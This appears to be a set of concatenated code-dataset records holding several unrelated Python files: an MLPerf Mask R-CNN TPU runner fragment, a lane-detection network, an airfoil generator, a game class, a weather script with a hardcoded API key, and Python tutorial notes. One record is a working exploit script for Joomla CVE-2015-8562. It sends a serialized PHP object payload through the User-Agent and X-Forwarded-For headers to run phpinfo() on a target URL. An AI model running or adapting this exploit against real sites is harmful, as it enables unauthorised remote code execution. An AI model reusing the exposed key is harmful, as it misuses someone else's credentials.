tf.Summary(value=list(summaries))\n summary_writer.add_summary(tf_summary, current_step)\n\n def get_predict_results(self, cur_epoch):\n \"\"\"Run the predict loop on the TPU device.\"\"\"\n for step in range(self.eval_steps):\n tf.logging.info(\n \"TrainAndEvalLowLevelRunner: reading eval step %d results\", step)\n predictions = {name: [] for name in self.outfeed_names}\n for outfeed_dict in self.train_eval_sess.run(self.dequeue_ops):\n for name, tensors in six.iteritems(outfeed_dict):\n predictions[name].extend(tensors)\n if step == self.eval_steps - 1:\n # all predictions is read from device, async eval post-process starts.\n # next train on device also starts.\n mlp_log.mlperf_print(\n \"block_stop\", None, metadata={\"first_epoch_num\": cur_epoch,\n \"epoch_count\": 1})\n mlp_log.mlperf_print(\n \"eval_start\", None, metadata={\"epoch_num\": cur_epoch})\n tf.logging.info(\"TrainAndEvalLowLevelRunner: start eval epoch %d.\",\n cur_epoch)\n mlp_log.mlperf_print(\n \"block_start\", None, metadata={\"first_epoch_num\": cur_epoch + 1,\n \"epoch_count\": 1})\n yield predictions\n\n def train_and_eval(self):\n \"\"\"Performs distributed model eval and writes a summary to directory.\"\"\"\n self.run_success = False\n self.continue_train = True\n\n # queues for predictions post-processing.\n def post_processing_thread_fn():\n \"\"\"Run post-processing on CPU for predictions.\"\"\"\n mlp_log.mlperf_print(\n \"block_start\", None, metadata={\"first_epoch_num\": 0,\n \"epoch_count\": 1})\n for cur_epoch in range(self.total_epoch):\n\n eval_begin = time.time()\n # Enables multi-processing to accelerate post-processing.\n eval_multiprocess.eval_multiprocessing(\n self.eval_steps, self.get_predict_results(cur_epoch),\n self.eval_metric, self.eval_params[\"eval_worker_count\"])\n\n pred_end = time.time()\n tf.logging.info(\"prediction takes %d seconds.\", pred_end - eval_begin)\n\n num_eval_samples, eval_results = self.eval_metric.evaluate()\n eval_end = time.time()\n tf.logging.info(\"COCO evaluates %d samples\", num_eval_samples)\n if num_eval_samples != self.eval_params[\"eval_samples\"]:\n tf.logging.info(\"COCO fails to evaluate all %d samples, exit!\" %\n self.eval_params[\"eval_samples\"])\n self.run_success = False\n self.continue_train = False\n return\n tf.logging.info(\"one evaluation takes %d seconds\",\n eval_end - eval_begin)\n self.write_eval_summary(self.eval_summary_writer, eval_results,\n cur_epoch * self.iterations_per_loop)\n tf.logging.info(\"AP: %s\" % eval_results[\"AP\"])\n tf.logging.info(\"mask_AP: %s\" % eval_results[\"mask_AP\"])\n # Eval epoch is 0-indexed (for MLPerf log parsing).\n mlp_log.mlperf_print(\n \"eval_stop\", None, metadata={\"epoch_num\": cur_epoch})\n # TODO(b/127959551): use both metrics once the bug is resolved.\n mlp_log.mlperf_print(\n \"eval_accuracy\", (float(eval_results[\"AP\"]),\n float(eval_results[\"mask_AP\"])),\n metadata={\"epoch_num\": cur_epoch})\n\n if (eval_results[\"AP\"] >= mask_rcnn_params.BOX_EVAL_TARGET and\n eval_results[\"mask_AP\"] >= mask_rcnn_params.MASK_EVAL_TARGET):\n mlp_log.mlperf_print(\"run_stop\", None, metadata={\"status\": \"success\"})\n self.run_success = True\n self.continue_train = False\n return\n\n # Run predict post processing thread on the background.\n post_processing_thread = threading.Thread(target=post_processing_thread_fn)\n post_processing_thread.start()\n if self.train_params[\"all_in_one_session\"]:\n tf.logging.info(\"TrainAndEvalLowLevelRunner: start train_eval sessions\")\n self.train_eval_sess.run(self.train_eval_op)\n else:\n if self.train_params[\"train_and_eval_save_checkpoint\"]:\n ckpt_saver = runner_utils.AsyncCheckpointSaver(\n _MAX_NUM_CHECKPOINT_THREADS, self.saver, self.model_dir,\n self.train_eval_sess)\n cur_epoch = 0\n while cur_epoch < self.total_epoch and self.continue_train:\n tf.logging.info(\"TrainAndEvalLowLevelRunner: start train epoch: %d\",\n cur_epoch)\n start = time.time()\n self.train_eval_sess.run(self.train_eval_op)\n end = time.time()\n self.write_summary(\n summary_writer=self.summary_writer,\n graph=self.train_eval_graph,\n global_step=cur_epoch * self.iterations_per_loop,\n elapsed_time=end - start,\n elapsed_steps=self.iterations_per_loop,\n trained_examples=self.train_params[\"num_examples_per_epoch\"])\n if self.train_params[\"train_and_eval_save_checkpoint\"]:\n ckpt_saver.checkpoint(cur_epoch * self.iterations_per_loop)\n if self.run_success or not self.continue_train:\n break\n cur_epoch += 1\n\n post_processing_thread.join()\n if not self.run_success:\n mlp_log.mlperf_print(\"run_stop\", None, metadata={\"status\": \"abort\"})\n","sub_path":"Google/benchmarks/mask/implementations/tpu-v3-128-mask/mask_rcnn/train_and_eval_low_level_runner.py","file_name":"train_and_eval_low_level_runner.py","file_ext":"py","file_size_in_byte":24790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"217189227","text":"#!/usr/bin/env python\r\n# author:Xiaogang\r\n# Help: joomla 1.5-3.4.5 反序列化命令执行漏洞\r\n# inurl:component/users/?view=login\r\n\r\nimport requests\r\nimport sys\r\n\r\n\r\ndef test_hint():\r\n print('[INFO] Checking Joomla 1.5 - 3.4.5 ...')\r\n\r\ndef test(url):\r\n target = url.strip()\r\n headers = make_headers()\r\n for i in headers:\r\n try:\r\n test_hint()\r\n result = get_url(target,i)\r\n if \"PHP Version\" in result.text:\r\n print(\"{}成功执行phpinfo\".format(i.keys()))\r\n else:\r\n print(\"{}漏洞不存在\".format(i.keys()))\r\n except Exception as e:\r\n print(\"出现错误\",e)\r\n\r\n\r\ndef get_url(url,headers):\r\n cookies = requests.request(\"GET\", url, timeout=10,headers=headers).cookies\r\n response = requests.request(\"GET\",url,timeout=10,headers=headers,cookies=cookies)\r\n return response\r\n\r\ndef make_headers():\r\n terminate = '\\xf0\\x9d\\x8c\\x86'\r\n payload = r'''123}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:4:\"\\0\\0\\0a\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:5:\"cache\";b:1;s:19:\"cache_name_function\";s:6:\"assert\";s:10:\"javascript\";i:9999;s:8:\"feed_url\";s:37:\"phpinfo();JFactory::getConfig();exit;\";}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";i:1;}'''\r\n headers1 = {\r\n 'User-Agent': payload+terminate\r\n }\r\n headers2 = {\r\n 'X-Forwarded-For': payload+terminate,\r\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:49.0) Gecko/20100101 Firefox/49.0'\r\n }\r\n header = [headers1,headers2]\r\n return header\r\n\r\n\r\ndef main():\r\n args = sys.argv\r\n if len(args) == 2:\r\n url = args[1]\r\n test(url)\r\n else:\r\n print(\"Usage: python {} url地址 \".format(args[0]))\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n\r\n","sub_path":"Joomla/Joomla_1.5-3.4.5_反序列化_CVE-2015-8562.py","file_name":"Joomla_1.5-3.4.5_反序列化_CVE-2015-8562.py","file_ext":"py","file_size_in_byte":1897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"111261391","text":"#--coding:utf-8--\nimport torch.nn as nn\nimport torch\nimport math\n\ndef conv3x3(in_planes, out_planes, stride=1):\n \"3x3 convolution with padding\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,\n padding=1, bias=False)\n\n\nclass conv2DBatchNormRelu(nn.Module):\n def __init__(self, in_channels, n_filters, stride=1, k_size=3, padding=1, bias=True, dilation=1, with_bn=True):\n super(conv2DBatchNormRelu, self).__init__()\n\n conv_mod = nn.Conv2d(int(in_channels), int(n_filters), kernel_size=k_size, \n padding=padding, stride=stride, bias=bias, dilation=dilation)\n\n if with_bn:\n self.cbr_unit = nn.Sequential(conv_mod,\n nn.BatchNorm2d(int(n_filters)),\n nn.ReLU(inplace=True),)\n else:\n self.cbr_unit = nn.Sequential(conv_mod,\n nn.ReLU(inplace=True),)\n\n def forward(self, inputs):\n outputs = self.cbr_unit(inputs)\n return outputs\n\n\nclass sharedBottom(nn.Module):\n def __init__(self,):\n super(sharedBottom, self).__init__()\n self.conv1 = conv2DBatchNormRelu(3, 16, 2) \n self.conv2a1 = conv2DBatchNormRelu(16, 16, 2)\n self.conv2a2 = conv2DBatchNormRelu(16,8)\n self.conv2a3 = conv2DBatchNormRelu(8,4)\n self.conv2a4 = conv2DBatchNormRelu(4,4)\n self.conv2a_strided = conv2DBatchNormRelu(32,32,2)\n self.conv3 = conv2DBatchNormRelu(32,32,2)\n self.conv4 = conv2DBatchNormRelu(32,32,1)\n self.conv6 = conv2DBatchNormRelu(32,64,2)\n self.conv8 = conv2DBatchNormRelu(64,64,1)\n self.conv9 = conv2DBatchNormRelu(64,128,2)\n self.conv11 = conv2DBatchNormRelu(128,128,1)\n self.conv11_1 = conv2DBatchNormRelu(128,32,1)\n self.conv11_2 = conv2DBatchNormRelu(128,32,1)\n self.conv11_3 = conv2DBatchNormRelu(128,32,1)\n self.conv11_4 = conv2DBatchNormRelu(32,64,1)\n self.conv11_6 = conv2DBatchNormRelu(32,64,1)\n self.conv11_5 = conv2DBatchNormRelu(64,128,1)\n\n def forward(self, x):\n x = self.conv1(x)\n x1 = self.conv2a1(x)\n x2 = self.conv2a2(x1)\n x3 = self.conv2a3(x2)\n x4 = self.conv2a4(x3)\n x = torch.cat([x1, x2, x3, x4], dim = 1)\n x = self.conv2a_strided(x)\n x = self.conv3(x)\n x = self.conv4(x)\n x = self.conv6(x)\n x = self.conv8(x)\n x = self.conv9(x)\n x = self.conv11(x)\n x1= self.conv11_1(x)\n x2= self.conv11_2(x)\n x3= self.conv11_3(x)\n x4= self.conv11_4(x3)\n x6= self.conv11_6(x2)\n x5= self.conv11_5(x4)\n x = torch.cat([x1, x5, x6], dim = 1)\n return x\n\nclass laneNet(nn.Module):\n def __init__(self,):\n super(laneNet, self).__init__()\n self.conv11_7 = conv2DBatchNormRelu(224,128,1)\n self.conv11_8 = conv2DBatchNormRelu(128,128,1)\n self.conv11_9 = conv2DBatchNormRelu(128,128,1)\n self.conv12 = conv2DBatchNormRelu(128,16,1)\n self.conv13 = conv2DBatchNormRelu(16,8,1)\n self.conv14 = nn.Conv2d(8, 2, 1,stride = 1,padding = 0, bias=True)\n def forward(self, x):\n x = self.conv11_7(x)\n x = self.conv11_8(x)\n x = self.conv11_9(x)\n x = nn.Upsample(size=(45,53),mode='bilinear')(x)\n x = self.conv12(x)\n x = nn.Upsample(size=(177,209),mode='bilinear')(x)\n x = self.conv13(x)\n x = self.conv14(x)\n return x \n\nclass clusterNet(nn.Module):\n def __init__(self,):\n super(clusterNet, self).__init__()\n self.conv11_7 = conv2DBatchNormRelu(224,128,1)\n self.conv11_8 = conv2DBatchNormRelu(128,128,1)\n self.conv11_9 = conv2DBatchNormRelu(128,128,1)\n self.conv12 = conv2DBatchNormRelu(128,16,1)\n self.conv13 = conv2DBatchNormRelu(16,8,1)\n self.deconv1 = nn.ConvTranspose2d(128, 128, kernel_size=3, padding=1, stride=2, bias=True)\n self.deconv2 = nn.ConvTranspose2d(128, 128, kernel_size=3, padding=1, stride=2, bias=True)\n self.deconv3 = nn.ConvTranspose2d(128, 128, kernel_size=3, padding=1, stride=2, bias=True)\n self.deconv4 = nn.ConvTranspose2d(16, 16, kernel_size=3, padding=1, stride=2, bias=True)\n self.conv14 = nn.Conv2d(8, 4, 1,stride = 1,padding = 0, bias=True)\n def forward(self, x):\n x = self.conv11_7(x)\n x = self.deconv1(x)\n x = self.conv11_8(x)\n x = self.deconv2(x)\n x = self.conv11_9(x)\n x = self.deconv3(x)\n x = self.conv12(x)\n x = self.deconv4(x)\n x = self.conv13(x)\n x = self.conv14(x)\n return x \n\nclass insClsNet(nn.Module):\n def __init__(self,):\n super(insClsNet, self).__init__()\n self.conv11_7 = conv2DBatchNormRelu(224,128,1)\n self.conv11_8 = conv2DBatchNormRelu(128,128,1)\n self.conv11_9 = conv2DBatchNormRelu(128,128,1)\n self.conv12 = conv2DBatchNormRelu(128,64,1)\n self.conv13 = conv2DBatchNormRelu(64,64,1)\n self.global_pool = nn.AdaptiveAvgPool2d((1, 1))\n self.ins_cls_out = nn.Sequential()\n self.ins_cls_out.add_module('linear', nn.Linear(64, 1))\n self.ins_cls_out.add_module('sigmoid', nn.Sigmoid())\n\n\n def forward(self, x):\n x = self.conv11_7(x)\n x = self.conv11_8(x)\n x = self.conv11_9(x)\n x = self.conv12(x)\n x = self.conv13(x)\n x = self.global_pool(x)\n x = x.squeeze(3).squeeze(2)\n x_ins_cls = self.ins_cls_out(x)\n return x_ins_cls \n\nclass hNet(nn.Module):\n def __init__(self,):\n super(hNet, self).__init__()\n self.conv11_7 = conv2DBatchNormRelu(224,128,1)\n self.conv11_8 = conv2DBatchNormRelu(128,128,1)\n self.conv11_9 = conv2DBatchNormRelu(128,128,1)\n self.global_pool = nn.AdaptiveAvgPool2d((1, 1))\n self.h_cls_out = nn.Sequential()\n self.h_cls_out.add_module('linear1', nn.Linear(128, 256))\n self.h_cls_out.add_module('bn', torch.nn.BatchNorm1d(256))\n self.h_cls_out.add_module('relu', torch.nn.ReLU())\n self.h_cls_out.add_module('linear2', nn.Linear(256, 6))\n\n\n def forward(self, x):\n x = self.conv11_7(x)\n x = self.conv11_8(x)\n x = self.conv11_9(x)\n x = self.global_pool(x)\n x = x.squeeze(3).squeeze(2)\n x_h_cls = self.h_cls_out(x)\n return x_h_cls \n \nclass Net(nn.Module):\n def __init__(self):\n # nn.Module子类的函数必须在构造函数中执行父类的构造函数\n # 下式等价于nn.Module.__init__(self)\n super(Net, self).__init__()\n self.bottom = sharedBottom()\n self.sem_seg = laneNet()\n self.ins_seg = clusterNet()\n self.ins_cls = insClsNet()\n self.hnet = hNet()\n self._initialize_weights()\n\n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal(m.weight.data)\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n\n def forward(self, x): \n x = self.bottom(x)\n x_sem = self.sem_seg(x)\n x_ins = self.ins_seg(x)\n x_cls = self.ins_cls(x)\n x_hnet = self.hnet(x)\n return x_sem, x_ins, x_cls, x_hnet\n\n#net = Net()\n#print(net)\n","sub_path":"hnet/lanenet_hnet.py","file_name":"lanenet_hnet.py","file_ext":"py","file_size_in_byte":7495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"414145576","text":"import requests\r\nfrom datetime import datetime\r\nimport simplejson as json\r\n\r\napi_key = '9c81e9a16bf7f8245ff0fa3838375055'\r\nlocation = input(\"Enter the city name:\")\r\n\r\ncomplete_api_link = \"https://api.openweathermap.org/data/2.5/weather?q=\"+location+\"&appid=\"+api_key\r\napi_link = requests.get(complete_api_link)\r\napi_data = api_link.json()\r\n\r\ntemp_city = ((api_data['main']['temp']) - 273.15)\r\nweather_desc = api_data['weather'][0]['description']\r\nhmdt = api_data['main']['humidity']\r\nwind_spd = api_data['wind']['speed']\r\ndate_time = datetime.now().strftime(\"%d %b %Y | %I:%M:%S %p\")\r\n\r\n\r\nprint(\"----------------------------------------------------------\")\r\nprint(\"Weather stats for - {} || {}\".format(location.upper(), date_time))\r\nprint(\"----------------------------------------------------------\")\r\n\r\nprint(\"Current temperature is: {:.2f} deg C\".format(temp_city))\r\nprint(\"Current weather desc :\",weather_desc)\r\nprint(\"Current Humidity :\",hmdt, '%')\r\nprint(\"Current Wind Speed :\",wind_spd,'kmph')\r\n\r\n\r\nprint()\r\nx=print(\"Weather stats for - {} || {}\".format(location.upper(), date_time))\r\ny=print(\"Current temperature is: {:.2f} deg C\".format(temp_city))\r\nz=print(\"Current weather desc :\",weather_desc)\r\na=print(\"Current Humidity :\",hmdt, '%')\r\nb=print(\"Current Wind Speed :\",wind_spd,'kmph')\r\n\r\nmy_records = {\"weather stats:\":x,\r\n \"temperature:\":y,\r\n \"weather desc:\":z,\r\n \"humidity:\":a,\r\n \"wind speed:\":b}\r\n\r\njson_obj = json.dumps(my_records)\r\n\r\nwith open(\"cyber_security_rj.txt\",\"w\") as f:\r\n f.write(json_obj)\r\n f.close()\r\n","sub_path":"cyber_security_Roanek_Jena.py","file_name":"cyber_security_Roanek_Jena.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"302355608","text":"\r\n\"\"\"\r\nThis library\r\n\r\n\"\"\"\r\nimport bezier\r\nimport numpy as np\r\nimport math\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\n\r\n\"\"\"\r\nWe want to create a library that make an airfoil class with attributes\r\n\r\nthetaBase=thetaEnd\r\n\r\n--> make option for inches or metric\r\n\"\"\"\r\ndef airfoil(numPoints,RT,camber,theta,zd):\r\n\r\n N=150\r\n RT_rad=math.radians(RT)\r\n theta_rad=math.radians(theta)\r\n #Ref Dims\r\n Rc1_endpx,Rc1_endpy=camber*math.cos(RT_rad),camber*math.sin(RT_rad)\r\n\r\n Rc1_p3x = Rc1_endpx*(1-0.02) #+ offset\r\n Rc1_p3y = Rc1_endpy*(1+0.3) #+ offset\r\n Rc1_p2x = Rc1_p3x*0.8 #+ offset\r\n Rc1_p2y = Rc1_p3y*1.8 #+ offset\r\n\r\n Rc2_p3x = Rc1_endpx*(1+0.03) #+ offset\r\n Rc2_p3y = Rc1_endpy*(1-0.35) #+ offset\r\n Rc2_p2x = Rc1_p3x*0.9 #+ offset\r\n Rc2_p2y = Rc1_p3y*0.1 #+ offset\r\n\r\n #Actual\r\n c1_endpx,c1_endpy=camber*math.cos(theta_rad),camber*math.sin(theta_rad)\r\n\r\n c1_p3x = c1_endpx - Rc1_endpx*(0.02)\r\n c1_p3y = c1_endpy + Rc1_endpy*(0.3)\r\n c1_p2x = c1_p3x - Rc1_p3x*0.2\r\n c1_p2y = c1_p3y + Rc1_p3y*0.8\r\n\r\n c2_p3x = c1_endpx + Rc1_endpx*(0.03)\r\n c2_p3y = c1_endpy - Rc1_endpy*(0.35)\r\n c2_p2x = c1_p3x - Rc1_p3x*0.1\r\n c2_p2y = c1_p3y - Rc1_p3y*0.9\r\n\r\n\r\n nodes1 = np.asfortranarray([[0.0, c1_p2x, c1_p3x , c1_endpx],[0.0, c1_p2y, c1_p3y, c1_endpy],])\r\n nodes2 = np.asfortranarray([[0.0, c2_p2x, c2_p3x , c1_endpx],[0.0, c2_p2y, c2_p3y, c1_endpy],])\r\n\r\n top,bottom= bezier.Curve(nodes1, degree=3), bezier.Curve(nodes2, degree=3)\r\n s_vals = np.linspace(0,1,N)\r\n top,bottom = top.evaluate_multi(s_vals), bottom.evaluate_multi(s_vals)\r\n\r\n x=np.concatenate( [ top[0],bottom[0][1:len(bottom[0])-1][::-1] ] )\r\n y=np.concatenate( [ top[1],bottom[1][1:len(bottom[1])-1][::-1] ] )\r\n\r\n #C=[np.array(x) - max(x)/2, np.array(y) - max(y)/2]\r\n\r\n # fig = plt.figure()\r\n # ax = fig.gca(projection='3d')\r\n # # ax.plot( C[0],C[1])\r\n # # #ax.plot( [0.2,3,4], [2,3,4], [1,5,6])\r\n # # plt.show()\r\n\r\n return [np.array(x)-max(x)/2,np.array(y)-max(y)/2,np.full((2*numPoints-2,),zd)]\r\n\r\ndef ellipse(numPoints,camber, aoa,zd):\r\n \"\"\"\r\n Create an ellipse in xyz space based on given camber z coord and angle\r\n of attack (aoa)\r\n \"\"\"\r\n a,b,theta0,N=camber/2,camber/4,math.radians(aoa),numPoints\r\n\r\n #formula for rotated ellipse\r\n x=[a*math.cos(t)*math.cos(theta0)-b*math.sin(t)*math.sin(theta0) for t in np.linspace(0,2*3.14,N)]\r\n y=[a*math.cos(t)*math.sin(theta0)+b*math.sin(t)*math.cos(theta0) for t in np.linspace(0,2*3.14,N)]\r\n\r\n return np.array([x,y,np.full( (numPoints,),zd)] )\r\n","sub_path":"prop-gen-tool/airfoils.py","file_name":"airfoils.py","file_ext":"py","file_size_in_byte":2608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"156413479","text":"from Unit import *\nfrom random import randint\nfrom Locations import *\n\nclass Char(Unit):\n def __init__(self, race, name, level, location):\n self.name = name\n self.race = race\n self.level = level\n self.stat_str = 0\n self.stat_dex = 0\n self.stat_con = 0\n self.health = 0\n self.max_health = 0\n self.exp = 0\n self.energy = 0\n self.max_energy = 100\n self.location = location\n self.char_stat_creation()\n\n\n def __repr__(self):\n return \"Greetings, %s, the %s.\" % (self.name, self.race)\n\n exp_for_level_size_dict = {1: 100, 2: 250, 3: 475, 4: 820, 5: 1330, 6: 2090, 7: 3230, 8: 4940, 9: 7500, 10: 11350}\n\n def gather_resources(self, resource):\n a = False\n b = randint(resource.min_amount, resource.max_amount)\n self.energy -= resource.energy_cost\n for n in self.inventory:\n if resource.name == n:\n a = True\n if a == True:\n self.inventory[resource.name] += b\n print(\"You have gathered %i %s\" % (b, resource.name))\n print(self.inventory)\n # print(\"Now you have %i %s in your backpack\" % (self.inventory[resource.name], resource.name))\n else:\n self.inventory[resource.name] = b\n print(\"You have gathered %i %s\" % (b, resource.name))\n print(self.inventory)\n # print(\"Now you have %i %s in your backpack\" % (self.inventory[resource.name], resource.name))\n\n def level_up(self):\n if self.exp >= self.exp_for_level_size_dict[self.level]:\n self.level += 1\n self.check_health()\n self.creation()\n\n print(\"Congratulation! You are now level %i\" % self.level)\n\n def combat_victory(self, monster):\n exp = monster.gives_exp + randint(0, monster.gives_exp / 10)\n self.exp += exp\n print(\"You have gained %i experience\" % exp)\n print(\"You now have %i\" % self.exp)\n self.level_up()\n monster.respawn()\n\n def char_stat_creation(self):\n if self.race == \"Elf\":\n self.stat_str = 10\n self.stat_dex = 16\n self.stat_con = 8\n elif self.race == \"Orc\":\n self.stat_str = 14\n self.stat_dex = 8\n self.stat_con = 12\n elif self.race == \"Human\":\n self.stat_str = 10\n self.stat_dex = 12\n self.stat_con = 12\n self.check_health()\n self.creation()\n\n def show_my_health(self):\n print(\"You have %i con\" % self.stat_con)\n print(\"You have %i health left\" % self.health)\n\n def stat_change(self, stat, value): # Stat change and announce the result\n if stat == 'con':\n self.stat_con += value\n self.check_health()\n return print(\"Yor constitution is increased by %i and now it is %i\" % (value, self.stat_con))\n elif stat == 'dex':\n self.stat_dex += value\n self.creation()\n return print(\"Yor dexterity is increased by %i and now it is %i\" % (value, self.stat_dex))\n elif stat == 'str':\n self.stat_str += value\n self.creation()\n return print(\"Yor strength is increased by %i and now it is %i\" % (value, self.stat_str))\n else:\n return print(\"There is no such stat\")\n\n def death(self, reason):\n self.game_over(reason)\n\n\n def game_over(self, reason):\n self.is_alive = False\n print(\"You are dead !!! GAME OVER\")\n print(reason)\n\n","sub_path":"Char.py","file_name":"Char.py","file_ext":"py","file_size_in_byte":3558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"405205473","text":"import random\n\"\"\"\n基本数据类型\n\nmy_str = 'hello world'\nmy_int = 10\nmy_float = 2.5\nmy_bool = False\nprint(type(my_str))\nprint(type(my_bool))\nprint(type(my_float))\nprint(type(my_int))\n\"\"\"\n\n\n\"\"\"\n类型转换\n\na = int(input('a='))\nb = int(input('b='))\nprint('%d+%d=%d' % (a, b, a+b))\n\"\"\"\n\n\"\"\"\n华氏度换算摄氏度\nC=(F - 32) \\div 1.8\n\nf = float(input('f'))\nc = (f - 32) / 1.8\nprint('c:%f' % c)\n\"\"\"\n\"\"\"\n计算圆形周长和面积\n\npi = 3.14\nr = float(input('r:'))\ns = r*r*pi\nd = 2*pi*r\nprint('s=%f,d=%f' % (s, d))\n\"\"\"\n\"\"\"\n猜数字游戏\n计算机出一个1~100之间的随机数由人来猜\n计算机根据人猜的数字分别给出提示大一点/小一点/猜对了\n\nVersion: 0.1\nAuthor: 骆昊\n\n\nanswer = random.randint(1, 100)\ncounter = 0\nwhile True:\n counter += 1\n number = int(input('请输入: '))\n if number < answer:\n print('大一点')\n elif number > answer:\n print('小一点')\n else:\n print('恭喜你猜对了!')\n break\nprint('你总共猜了%d次' % counter)\nif counter > 7:\n print('你的智商余额明显不足')\n\"\"\"\n\n\"\"\"\n定义函数\n\n\n\ndef factorial(num):\n result = 1\n for i in range(1, num+1):\n result = result * i\n return result\n\n\na = int(input('input a number:'))\nprint(factorial(a))\n\n\n\"\"\"\n\"\"\"\n函数传参\n\n\n\ndef add(a=3, b=6, c=7):\n return b\n\n\nmy_sum = add(1, c=2, b=3)\nprint(my_sum)\n\"\"\"\n\n\"\"\"\n可变参数\n\n\n\ndef add(*args):\n result = 0\n for i in args:\n result += i\n return result\n\n\nprint(add(1, 2, 3, 4))\n\"\"\"\n\"\"\"\n用模块管理函数\n\nfrom module1 import foo\nfoo()\n\nimport module1 as m1\nm1.foo()\n\"\"\"\n\"\"\"\n转义字符\n\ns1 = 'hello\\n'\ns2 = r'hello\\n'\nprint(s1, s2, end='')\n\"\"\"\n\"\"\"\n字符串的运算\n\ns1 = 'hello' * 3\ns2 = 'world'\ns1 += s2\nprint(s1)\nprint('ll' in s1) # 成员运算\n# 切片\nprint(s1[0])\nprint(s1[2:5])\nprint(s1[2:21:2]) # 开始索引:结束索引:增量\nprint(s1[-3:-1])\nprint(s1[-1:-21:-1])\n\"\"\"\n\"\"\"\n字符串的处理\n\nstr1 = 'hello, world!'\n# 通过内置函数len计算字符串的长度\nprint(len(str1)) # 13\n# 获得字符串首字母大写的拷贝\nprint(str1.capitalize()) # Hello, world!\n# 获得字符串每个单词首字母大写的拷贝\nprint(str1.title()) # Hello, World!\n# 获得字符串变大写后的拷贝\nprint(str1.upper()) # HELLO, WORLD!\n# 从字符串中查找子串所在位置\nprint(str1.find('or')) # 8\nprint(str1.find('shit')) # -1\n# 与find类似但找不到子串时会引发异常\n# print(str1.index('or'))\n# print(str1.index('shit'))\n# 检查字符串是否以指定的字符串开头\nprint(str1.startswith('He')) # False\nprint(str1.startswith('hel')) # True\n# 检查字符串是否以指定的字符串结尾\nprint(str1.endswith('!')) # True\n# 将字符串以指定的宽度居中并在两侧填充指定的字符\nprint(str1.center(50, '*'))\n# 将字符串以指定的宽度靠右放置左侧填充指定的字符\nprint(str1.rjust(50, ' '))\nstr2 = 'abc123456'\n# 检查字符串是否由数字构成\nprint(str2.isdigit()) # False\n# 检查字符串是否以字母构成\nprint(str2.isalpha()) # False\n# 检查字符串是否以数字和字母构成\nprint(str2.isalnum()) # True\nstr3 = ' jackfrued@126.com '\nprint(str3)\n# 获得字符串修剪左右两侧空格之后的拷贝\nprint(str3.strip())\n\"\"\"\n\"\"\"\n列表的使用\n\nlist1 = [1, 3, 5, 7, 100]\nprint(list1) # [1, 3, 5, 7, 100]\n# 乘号表示列表元素的重复\nlist2 = ['hello'] * 3\nprint(list2) # ['hello', 'hello', 'hello']\n# 计算列表长度(元素个数)\nprint(len(list1)) # 5\n# 下标(索引)运算\nprint(list1[0]) # 1\nprint(list1[4]) # 100\n# print(list1[5]) # IndexError: list index out of range\nprint(list1[-1]) # 100\nprint(list1[-3]) # 5\nlist1[2] = 300\nprint(list1) # [1, 3, 300, 7, 100]\n# 通过循环用下标遍历列表元素\nfor index in range(len(list1)):\n print(list1[index])\n# 通过for循环遍历列表元素\nfor elem in list1:\n print(elem)\n# 通过enumerate函数处理列表之后再遍历可以同时获得元素索引和值\nfor index, elem in enumerate(list1):\n print(index, elem)\n\"\"\"\n\"\"\"\n列表元素的添加与删除\n\nlist1 = [1, 3, 5, 7, 100]\n# 添加元素\nlist1.append(200)\nlist1.insert(1, 400)\n# 合并两个列表\n# list1.extend([1000, 2000])\nlist1 += [1000, 2000]\nprint(list1) # [1, 400, 3, 5, 7, 100, 200, 1000, 2000]\nprint(len(list1)) # 9\n# 先通过成员运算判断元素是否在列表中,如果存在就删除该元素\nif 3 in list1:\n list1.remove(3)\nif 1234 in list1:\n list1.remove(1234)\nprint(list1) # [1, 400, 5, 7, 100, 200, 1000, 2000]\n# 从指定的位置删除元素\nlist1.pop(0)\nlist1.pop(len(list1) - 1)\nprint(list1) # [400, 5, 7, 100, 200, 1000]\n# 清空列表元素\nlist1.clear()\nprint(list1) # []\n\"\"\"\n\"\"\"\n列表的排序\n\nlist1 = ['orange', 'apple', 'zoo', 'internationalization', 'blueberry']\nlist2 = sorted(list1)\n# sorted函数返回列表排序后的拷贝不会修改传入的列表\n# 函数的设计就应该像sorted函数一样尽可能不产生副作用\nlist3 = sorted(list1, reverse=True)\n# 通过key关键字参数指定根据字符串长度进行排序而不是默认的字母表顺序\nlist4 = sorted(list1, key=len)\nprint(list1)\nprint(list2)\nprint(list3)\nprint(list4)\n# 给列表对象发出排序消息直接在列表对象上进行排序\nlist1.sort(reverse=True)\nprint(list1)\n\"\"\"\n\"\"\"\n生成式和生成器\n\nimport sys\nf = [x for x in range(1, 10)]\nprint(f)\nf = [x + y for x in 'ABCDE' for y in '1234567']\nprint(f)\n# 用列表的生成表达式语法创建列表容器\n# 用这种语法创建列表之后元素已经准备就绪所以需要耗费较多的内存空间\nf = [x ** 2 for x in range(1, 1000)]\nprint(sys.getsizeof(f)) # 查看对象占用内存的字节数 9024\n# 请注意下面的代码创建的不是一个列表而是一个生成器对象\n# 通过生成器可以获取到数据但它不占用额外的空间存储数据\n# 每次需要数据的时候就通过内部的运算得到数据(需要花费额外的时间)\nf = (x ** 2 for x in range(1, 1000))\nprint(sys.getsizeof(f)) # 相比生成式生成器不占用存储数据的空间 